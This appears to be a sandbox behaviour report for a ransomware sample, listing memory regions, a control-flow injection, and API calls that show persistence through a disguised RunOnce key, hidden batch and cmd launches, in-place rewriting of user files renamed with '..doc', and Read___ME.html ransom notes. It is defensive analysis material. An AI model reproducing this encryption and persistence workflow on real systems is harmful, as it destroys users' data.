private_0x0000000000060000	0x00060000	0x0009ffff	Private Memory	Readable, Writable	Region Actions
private_0x00000000000a0000	0x000a0000	0x0019ffff	Private Memory	Readable, Writable	Region Actions
pagefile_0x00000000001a0000	0x001a0000	0x001a3fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x00000000001b0000	0x001b0000	0x001b1fff	Pagefile Backed Memory	Readable	Region Actions
private_0x00000000001c0000	0x001c0000	0x001c1fff	Private Memory	Readable, Writable	Region Actions
locale.nls	0x001d0000	0x0028dfff	Memory Mapped File	Readable	Region Actions
private_0x0000000000290000	0x00290000	0x002cffff	Private Memory	Readable, Writable	Region Actions
private_0x00000000002d0000	0x002d0000	0x002d0fff	Private Memory	Readable, Writable	Region Actions
private_0x00000000002e0000	0x002e0000	0x002fffff	Private Memory	Readable, Writable	Region Actions
private_0x00000000002e0000	0x002e0000	0x002effff	Private Memory	Readable, Writable	Region Actions
pagefile_0x00000000002e0000	0x002e0000	0x002e4fff	Pagefile Backed Memory	Readable, Writable	Region Actions
private_0x00000000002e0000	0x002e0000	0x002e6fff	Private Memory	Readable, Writable	Region Actions
private_0x00000000002f0000	0x002f0000	0x002fffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000300000	0x00300000	0x0030ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000310000	0x00310000	0x00323fff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000310000	0x00310000	0x0034ffff	Private Memory	Readable, Writable	Region Actions
pagefile_0x0000000000310000	0x00310000	0x00310fff	Pagefile Backed Memory	Readable, Writable	Region Actions
private_0x0000000000320000	0x00320000	0x0035ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000360000	0x00360000	0x0039ffff	Private Memory	Readable, Writable	Region Actions
pagefile_0x00000000003a0000	0x003a0000	0x003a0fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x00000000003b0000	0x003b0000	0x003b0fff	Pagefile Backed Memory	Readable	Region Actions
private_0x00000000003c0000	0x003c0000	0x003cffff	Private Memory	Readable, Writable	Region Actions
cversions.2.db	0x003d0000	0x003d3fff	Memory Mapped File	Readable	Region Actions
cversions.2.db	0x003e0000	0x003e3fff	Memory Mapped File	Readable	Region Actions
pagefile_0x00000000003f0000	0x003f0000	0x003f0fff	Pagefile Backed Memory	Readable, Writable	Region Actions
vworbzlbc.exe	0x00400000	0x0043bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
pagefile_0x0000000000400000	0x00400000	0x0040efff	Pagefile Backed Memory	Readable, Writable, Executable	Region Actions
private_0x0000000000410000	0x00410000	0x0050ffff	Private Memory	Readable, Writable	Region Actions
{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000007.db	0x00510000	0x00552fff	Memory Mapped File	Readable	Region Actions
propsys.dll.mui	0x00560000	0x00570fff	Memory Mapped File	Readable	Region Actions
pagefile_0x0000000000580000	0x00580000	0x00580fff	Pagefile Backed Memory	Readable, Writable	Region Actions
private_0x0000000000590000	0x00590000	0x0068ffff	Private Memory	Readable, Writable	Region Actions
pagefile_0x0000000000690000	0x00690000	0x00817fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000820000	0x00820000	0x009a0fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x00000000009b0000	0x009b0000	0x01daffff	Pagefile Backed Memory	Readable	Region Actions
private_0x0000000001db0000	0x01db0000	0x01f1ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000001db0000	0x01db0000	0x01eaffff	Private Memory	Readable, Writable	Region Actions
{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000013.db	0x01eb0000	0x01ec8fff	Memory Mapped File	Readable	Region Actions
private_0x0000000001ed0000	0x01ed0000	0x01f0ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000001f10000	0x01f10000	0x01f1ffff	Private Memory	Readable, Writable	Region Actions
sortdefault.nls	0x01f20000	0x02256fff	Memory Mapped File	Readable	Region Actions
private_0x0000000002260000	0x02260000	0x03268fff	Private Memory	Readable, Writable	Region Actions
private_0x0000000003270000	0x03270000	0x0336ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000003370000	0x03370000	0x0346ffff	Private Memory	Readable, Writable	Region Actions
{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db	0x03470000	0x034fafff	Memory Mapped File	Readable	Region Actions
private_0x0000000003500000	0x03500000	0x0353ffff	Private Memory	Readable, Writable	Region Actions
pagefile_0x0000000003540000	0x03540000	0x03540fff	Pagefile Backed Memory	Readable, Writable	Region Actions
private_0x00000000035f0000	0x035f0000	0x035fffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000003600000	0x03600000	0x036fffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000003700000	0x03700000	0x037fffff	Private Memory	Readable, Writable	Region Actions
iertutil.dll	0x737d0000	0x73a90fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
rsaenh.dll	0x73aa0000	0x73acefff	Memory Mapped File	Readable, Writable, Executable	Region Actions
bcrypt.dll	0x73ad0000	0x73aeafff	Memory Mapped File	Readable, Writable, Executable	Region Actions
cryptsp.dll	0x73af0000	0x73b02fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
mpr.dll	0x73cf0000	0x73d06fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
pcacli.dll	0x73d10000	0x73d1bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
urlmon.dll	0x73d20000	0x73e7ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
propsys.dll	0x73e80000	0x73fc1fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
uxtheme.dll	0x73fd0000	0x74044fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
bcryptprimitives.dll	0x74050000	0x740a8fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
cryptbase.dll	0x740b0000	0x740b9fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
sspicli.dll	0x740c0000	0x740ddfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
powrprof.dll	0x74100000	0x74143fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
oleaut32.dll	0x74150000	0x741e1fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
shcore.dll	0x74370000	0x743fcfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
clbcatq.dll	0x74410000	0x74491fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msvcrt.dll	0x744a0000	0x7455dfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
sechost.dll	0x74560000	0x745a2fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msctf.dll	0x745b0000	0x746cffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
kernel.appcore.dll	0x746e0000	0x746ebfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
kernelbase.dll	0x746f0000	0x74865fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
rpcrt4.dll	0x749e0000	0x74a8bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ole32.dll	0x74a90000	0x74b79fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
cfgmgr32.dll	0x74bd0000	0x74c05fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
shell32.dll	0x74c10000	0x75fcefff	Memory Mapped File	Readable, Writable, Executable	Region Actions
combase.dll	0x76040000	0x761f9fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
kernel32.dll	0x762a0000	0x7638ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
windows.storage.dll	0x76390000	0x7686cfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wow64cpu.dll	0x76870000	0x76877fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wow64.dll	0x76880000	0x768cefff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wow64win.dll	0x768d0000	0x76942fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
user32.dll	0x76960000	0x76a9ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
imm32.dll	0x76aa0000	0x76acafff	Memory Mapped File	Readable, Writable, Executable	Region Actions
profapi.dll	0x76ad0000	0x76adefff	Memory Mapped File	Readable, Writable, Executable	Region Actions
shlwapi.dll	0x76c00000	0x76c43fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
advapi32.dll	0x76c50000	0x76ccafff	Memory Mapped File	Readable, Writable, Executable	Region Actions
gdi32.dll	0x76f40000	0x7708cfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ntdll.dll	0x77090000	0x77208fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
private_0x000000007fea7000	0x7fea7000	0x7fea9fff	Private Memory	Readable, Writable	Region Actions
private_0x000000007feaa000	0x7feaa000	0x7feacfff	Private Memory	Readable, Writable	Region Actions
private_0x000000007fead000	0x7fead000	0x7feaffff	Private Memory	Readable, Writable	Region Actions
pagefile_0x000000007feb0000	0x7feb0000	0x7ffaffff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x000000007ffb0000	0x7ffb0000	0x7ffd2fff	Pagefile Backed Memory	Readable	Region Actions
private_0x000000007ffd5000	0x7ffd5000	0x7ffd7fff	Private Memory	Readable, Writable	Region Actions
private_0x000000007ffd8000	0x7ffd8000	0x7ffdafff	Private Memory	Readable, Writable	Region Actions
private_0x000000007ffdb000	0x7ffdb000	0x7ffddfff	Private Memory	Readable, Writable	Region Actions
private_0x000000007ffde000	0x7ffde000	0x7ffdefff	Private Memory	Readable, Writable	Region Actions
private_0x000000007ffdf000	0x7ffdf000	0x7ffdffff	Private Memory	Readable, Writable	Region Actions
private_0x000000007ffe0000	0x7ffe0000	0x7ffeffff	Private Memory	Readable	Region Actions
private_0x000000007fff0000	0x7fff0000	0x7fff470fffff	Private Memory	Readable	Region Actions
ntdll.dll	0x7fff47100000	0x7fff472c1fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
private_0x00007fff472c2000	0x7fff472c2000	0x7ffffffeffff	Private Memory	Readable	Region Actions

Injection Information

Injection Type	Source Process	Source Os Thread ID	Injection Info	Success	Count	Logfile
Modify Control Flow	#11: c:\users\ciihmnxmn6ps\appdata\roaming\vworbzlbc.exe	0xd44	os_tid = 0xd98, address = 0x770faef0		1	Fn

Threads

Thread 0xd98

(Host: 20, Network: 0)

Category	Operation	Information	Count	Logfile
Module	Get Filename	process_name = c:\users\ciihmnxmn6ps\appdata\roaming\vworbzlbc.exe, file_name_orig = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\vwOrbzLbc.exe, size = 2048	1	Fn
Environment	Get Environment String	name = temp, result_out = C:\Users\CIIHMN~1\AppData\Local\Temp	1	Fn
Environment	Get Environment String	name = appdata, result_out = C:\Users\CIiHmnxMn6Ps\AppData\Roaming	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce, value_name = BrowserUpdateCheck, data = 192	1	Fn
Registry	Create Key	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce	1	Fn
Registry	Write Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce, value_name = BrowserUpdateCheck, data = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\vwOrbzLbc.exe, size = 102, type = REG_SZ	1	Fn
Environment	Get Environment String	name = public, result_out = C:\Users\Public	1	Fn
File	Create	filename = C:\Users\Public\AE09C984DF6E74640B3271EADB5DD7C65FDE806235B2CDA478E0EFA9129C09E7, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
File	Read	filename = C:\Users\Public\AE09C984DF6E74640B3271EADB5DD7C65FDE806235B2CDA478E0EFA9129C09E7, size = 256, size_out = 256	1	Fn Data
File	Read	filename = C:\Users\Public\AE09C984DF6E74640B3271EADB5DD7C65FDE806235B2CDA478E0EFA9129C09E7, size = 768, size_out = 768	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
System	Sleep	duration = -1 (infinite)	1	Fn
File	Create Temp File	filename = C:\Users\CIIHMN~1\AppData\Local\Temp\tmpAD23.tmp, path = C:\Users\CIIHMN~1\AppData\Local\Temp, prefix = tmp	1	Fn
File	Create	filename = C:\Users\CIIHMN~1\AppData\Local\Temp\tmpAD23.tmp.bat, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
File	Write	filename = C:\Users\CIIHMN~1\AppData\Local\Temp\tmpAD23.tmp.bat, size = 445	1	Fn Data
Process	Create	process_name = C:\Users\CIIHMN~1\AppData\Local\Temp\tmpAD23.tmp.bat, os_pid = 0xe40, creation_flags = CREATE_NO_WINDOW, show_window = SW_HIDE	1	Fn
Module	Get Filename	process_name = c:\users\ciihmnxmn6ps\appdata\roaming\vworbzlbc.exe, file_name_orig = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\vwOrbzLbc.exe, size = 2048	1	Fn
Environment	Get Environment String	name = COMSPEC, result_out = C:\Windows\system32\cmd.exe	1	Fn
Process	Create	process_name = C:\Windows\system32\cmd.exe, show_window = SW_HIDE	1	Fn

Thread 0xda0

(Host: 24103, Network: 0)

Category	Operation	Information	Count	Logfile
File	Create	filename = C:\bootmgr, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
File	Write	filename = System Paging File, size = 128	1	Fn
File	Write	filename = System Paging File, size = 768	1	Fn
File	Create	filename = C:\hiberfil.sys, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
File	Write	filename = System Paging File, size = 128	1	Fn
File	Write	filename = System Paging File, size = 768	1	Fn
File	Create	filename = C:\pagefile.sys, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
File	Write	filename = System Paging File, size = 128	1	Fn
File	Write	filename = System Paging File, size = 768	1	Fn
File	Create	filename = C:\swapfile.sys, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
File	Write	filename = System Paging File, size = 128	1	Fn
File	Write	filename = System Paging File, size = 768	1	Fn
File	Create	filename = C:\Users\CIiHmnxMn6Ps\NTUSER.DAT, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
File	Write	filename = System Paging File, size = 128	1	Fn
File	Write	filename = System Paging File, size = 768	1	Fn
File	Create	filename = C:\Users\CIiHmnxMn6Ps\ntuser.dat.LOG1, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
File	Write	filename = System Paging File, size = 128	1	Fn
File	Write	filename = System Paging File, size = 768	1	Fn
File	Create	filename = C:\Users\CIiHmnxMn6Ps\ntuser.dat.LOG2, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
File	Write	filename = System Paging File, size = 128	1	Fn
File	Write	filename = System Paging File, size = 768	1	Fn
File	Create	filename = C:\Users\CIiHmnxMn6Ps\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TM.blf, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
File	Write	filename = System Paging File, size = 128	1	Fn
File	Write	filename = System Paging File, size = 768	1	Fn
File	Create	filename = C:\Users\CIiHmnxMn6Ps\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000001.regtrans-ms, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
File	Write	filename = System Paging File, size = 128	1	Fn
File	Write	filename = System Paging File, size = 768	1	Fn
File	Create	filename = C:\Users\CIiHmnxMn6Ps\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000002.regtrans-ms, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
File	Write	filename = System Paging File, size = 128	1	Fn
File	Write	filename = System Paging File, size = 768	1	Fn
File	Create	filename = C:\Users\CIiHmnxMn6Ps\ntuser.ini, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
File	Get Info	filename = C:\Users\CIiHmnxMn6Ps\ntuser.ini, type = size, size_out = 20	1	Fn
File	Read	filename = C:\Users\CIiHmnxMn6Ps\ntuser.ini, size = 8192, size_out = 20	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\ntuser.ini, size = 32	2	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\ntuser.ini, size = 16	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\ntuser.ini, size = 128	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\ntuser.ini, size = 768	1	Fn Data
File	Move	source_filename = C:\Users\CIiHmnxMn6Ps\ntuser.ini, destination_filename = C:\Users\CIiHmnxMn6Ps\ntuser.ini..doc, flags = MOVEFILE_REPLACE_EXISTING	1	Fn
File	Get Info	filename = C:\Users\CIiHmnxMn6Ps\Read___ME.html, type = file_attributes	1	Fn
File	Create	filename = C:\Users\CIiHmnxMn6Ps\Documents\My Shapes\Favorites.vssx, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
File	Get Info	filename = C:\Users\CIiHmnxMn6Ps\Documents\My Shapes\Favorites.vssx, type = size, size_out = 896	1	Fn
File	Read	filename = C:\Users\CIiHmnxMn6Ps\Documents\My Shapes\Favorites.vssx, size = 8192, size_out = 896	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Documents\My Shapes\Favorites.vssx, size = 896	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Documents\My Shapes\Favorites.vssx, size = 32	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Documents\My Shapes\Favorites.vssx, size = 16	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Documents\My Shapes\Favorites.vssx, size = 128	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Documents\My Shapes\Favorites.vssx, size = 768	1	Fn Data
File	Move	source_filename = C:\Users\CIiHmnxMn6Ps\Documents\My Shapes\Favorites.vssx, destination_filename = C:\Users\CIiHmnxMn6Ps\Documents\My Shapes\Favorites.vssx..doc, flags = MOVEFILE_REPLACE_EXISTING	1	Fn
File	Get Info	filename = C:\Users\CIiHmnxMn6Ps\Documents\My Shapes\Read___ME.html, type = file_attributes	1	Fn
File	Create	filename = C:\Users\CIiHmnxMn6Ps\Desktop\8-smyN.jpg, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
File	Get Info	filename = C:\Users\CIiHmnxMn6Ps\Desktop\8-smyN.jpg, type = size, size_out = 99692	1	Fn
File	Read	filename = C:\Users\CIiHmnxMn6Ps\Desktop\8-smyN.jpg, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Desktop\8-smyN.jpg, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\Desktop\8-smyN.jpg, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Desktop\8-smyN.jpg, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\Desktop\8-smyN.jpg, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Desktop\8-smyN.jpg, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\Desktop\8-smyN.jpg, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Desktop\8-smyN.jpg, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\Desktop\8-smyN.jpg, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Desktop\8-smyN.jpg, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\Desktop\8-smyN.jpg, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Desktop\8-smyN.jpg, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\Desktop\8-smyN.jpg, size = 8192, size_out = 1388	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Desktop\8-smyN.jpg, size = 1392	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Desktop\8-smyN.jpg, size = 32	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Desktop\8-smyN.jpg, size = 16	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Desktop\8-smyN.jpg, size = 128	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Desktop\8-smyN.jpg, size = 768	1	Fn Data
File	Move	source_filename = C:\Users\CIiHmnxMn6Ps\Desktop\8-smyN.jpg, destination_filename = C:\Users\CIiHmnxMn6Ps\Desktop\8-smyN.jpg..doc, flags = MOVEFILE_REPLACE_EXISTING	1	Fn
File	Get Info	filename = C:\Users\CIiHmnxMn6Ps\Desktop\Read___ME.html, type = file_attributes	1	Fn
File	Create	filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\AlternateServices.txt, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
File	Get Info	filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\AlternateServices.txt, type = size, size_out = 896	1	Fn
File	Read	filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\AlternateServices.txt, size = 8192, size_out = 896	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\AlternateServices.txt, size = 896	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\AlternateServices.txt, size = 32	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\AlternateServices.txt, size = 16	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\AlternateServices.txt, size = 128	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\AlternateServices.txt, size = 768	1	Fn Data
File	Move	source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\AlternateServices.txt, destination_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\AlternateServices.txt..doc, flags = MOVEFILE_REPLACE_EXISTING	1	Fn
File	Get Info	filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\Read___ME.html, type = file_attributes	1	Fn
File	Create	filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\parent.lock, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
File	Get Info	filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\parent.lock, type = size, size_out = 896	1	Fn
File	Read	filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\parent.lock, size = 8192, size_out = 896	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\parent.lock, size = 896	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\parent.lock, size = 32	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\parent.lock, size = 16	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\parent.lock, size = 128	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\parent.lock, size = 768	1	Fn Data
File	Move	source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\parent.lock, destination_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\parent.lock..doc, flags = MOVEFILE_REPLACE_EXISTING	1	Fn
File	Get Info	filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\Read___ME.html, type = file_attributes	1	Fn
File	Create	filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\SecurityPreloadState.txt, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
File	Get Info	filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\SecurityPreloadState.txt, type = size, size_out = 896	1	Fn
File	Read	filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\SecurityPreloadState.txt, size = 8192, size_out = 896	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\SecurityPreloadState.txt, size = 896	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\SecurityPreloadState.txt, size = 32	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\SecurityPreloadState.txt, size = 16	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\SecurityPreloadState.txt, size = 128	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\SecurityPreloadState.txt, size = 768	1	Fn Data
File	Move	source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\SecurityPreloadState.txt, destination_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\SecurityPreloadState.txt..doc, flags = MOVEFILE_REPLACE_EXISTING	1	Fn
File	Get Info	filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\Read___ME.html, type = file_attributes	1	Fn
File	Create	filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Flash Player\NativeCache\NativeCache.directory, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
File	Get Info	filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Flash Player\NativeCache\NativeCache.directory, type = size, size_out = 896	1	Fn
File	Read	filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Flash Player\NativeCache\NativeCache.directory, size = 8192, size_out = 896	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Flash Player\NativeCache\NativeCache.directory, size = 896	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Flash Player\NativeCache\NativeCache.directory, size = 32	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Flash Player\NativeCache\NativeCache.directory, size = 16	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Flash Player\NativeCache\NativeCache.directory, size = 128	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Flash Player\NativeCache\NativeCache.directory, size = 768	1	Fn Data
File	Move	source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Flash Player\NativeCache\NativeCache.directory, destination_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Flash Player\NativeCache\NativeCache.directory..doc, flags = MOVEFILE_REPLACE_EXISTING	1	Fn
File	Get Info	filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Flash Player\NativeCache\Read___ME.html, type = file_attributes	1	Fn
File	Create	filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Flash Player\NativeCache\Read___ME.html, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
